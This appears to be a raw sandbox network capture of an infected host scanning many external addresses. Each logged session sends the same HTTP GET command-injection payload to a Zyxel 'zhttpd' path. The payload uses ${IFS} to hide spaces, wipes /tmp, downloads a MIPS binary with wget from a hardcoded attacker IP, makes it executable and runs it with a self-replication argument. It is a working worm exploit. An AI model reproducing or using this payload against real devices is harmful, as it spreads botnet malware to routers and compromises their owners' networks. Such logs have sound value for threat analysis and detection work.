                                                Jan 29, 2024 07:07:42.189533949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2716192.168.2.23609605.105.30.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189562082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2717192.168.2.233994449.163.206.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189589024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2718192.168.2.234950876.146.19.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189634085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2719192.168.2.2333352121.254.147.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189651966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2720192.168.2.2339082170.80.147.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189677000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2721192.168.2.2349076114.20.142.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189719915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2722192.168.2.2359146121.187.51.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189773083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2723192.168.2.2334026169.120.45.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189811945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2724192.168.2.2342304159.159.30.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189842939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2725192.168.2.2351750155.49.164.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189903975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2726192.168.2.234408832.124.111.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189924955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2727192.168.2.23345564.219.45.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.189966917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2728192.168.2.2339174192.193.119.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190016985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2729192.168.2.235895832.32.129.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190042973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2730192.168.2.234360295.248.72.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190073013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2731192.168.2.234757890.35.94.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190107107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2732192.168.2.2352100139.110.164.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190128088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2733192.168.2.2348076185.191.181.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190174103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2734192.168.2.2352064205.179.243.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190203905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2735192.168.2.2345468192.55.83.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190239906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2736192.168.2.2356418221.4.178.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190287113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2737192.168.2.235383691.185.190.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190314054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2738192.168.2.2338990154.128.43.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190326929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2739192.168.2.2337924113.20.241.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190390110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2740192.168.2.234940091.143.105.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190407991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2741192.168.2.233908479.77.97.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190439939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2742192.168.2.2346950206.18.236.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190500975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2743192.168.2.2342490217.85.40.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190536976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2744192.168.2.2335840187.145.25.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190572023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2745192.168.2.236013619.155.109.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190606117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2746192.168.2.235886048.57.124.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190670967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2747192.168.2.2360514116.117.164.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190696955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2748192.168.2.2339642205.23.103.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190756083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2749192.168.2.233340669.14.196.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190789938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2750192.168.2.2338808125.89.52.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190834045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2751192.168.2.2360858159.241.228.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190879107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2752192.168.2.2338148129.150.16.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190933943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2753192.168.2.236093052.248.42.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190964937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2754192.168.2.2344002157.244.47.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.190999985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2755192.168.2.233598853.5.113.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191031933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2756192.168.2.234650699.249.157.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191066980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2757192.168.2.234522888.57.210.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191099882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2758192.168.2.234194889.116.33.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191129923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2759192.168.2.235671488.195.33.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191173077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2760192.168.2.2335432145.233.133.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191200972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2761192.168.2.234951262.151.157.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191220045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2762192.168.2.235213254.111.208.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191255093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2763192.168.2.23433464.168.176.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191301107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2764192.168.2.2339384178.21.246.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191329002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2765192.168.2.2357484195.113.180.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191370010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2766192.168.2.2353022221.65.14.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191406965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2767192.168.2.233822051.54.32.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191437960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2768192.168.2.2337184101.214.8.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191483974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2769192.168.2.2354144151.4.157.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191504955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2770192.168.2.2346194160.110.149.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191553116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2771192.168.2.2358594203.88.17.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191601992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2772192.168.2.2352966193.3.97.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191636086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2773192.168.2.235339278.85.90.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191658974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2774192.168.2.2357124201.182.188.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191729069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2775192.168.2.233862640.205.251.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191756964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2776192.168.2.2352094176.249.163.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191782951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2777192.168.2.2350304104.59.85.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191813946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2778192.168.2.233850091.172.45.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191855907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2779192.168.2.2348250174.133.55.150443
                                                TimestampBytes transferredDirectionData
